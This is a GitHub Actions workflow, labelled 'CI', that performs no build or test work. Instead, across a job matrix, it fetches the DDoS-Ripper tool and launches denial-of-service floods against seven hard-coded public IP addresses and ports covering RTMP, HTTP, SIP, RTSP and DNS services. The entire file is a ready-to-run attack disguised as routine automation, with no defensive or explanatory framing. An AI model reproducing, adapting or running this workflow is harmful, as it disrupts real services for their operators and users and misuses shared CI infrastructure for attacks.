name: CI

on:
  workflow_dispatch:

jobs:
  run:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        site: ['213.24.76.25', '213.24.76.25', '195.218.193.189', '95.173.148.51', '95.173.148.51', '95.173.148.51', '95.173.148.50']
        port: ['1935', '8080', '5060', '5060', '554', '53', '53']
    container:
      image: alpine/bombardier

    steps:
      - uses: actions/checkout@v2
        with:
          repository: palahsu/DDoS-Ripper

      - name: Run a multi-line script
        run: |
          python DRipper.py -s ${{ matrix.site }} -p ${{ matrix.port }} -t 135 -q
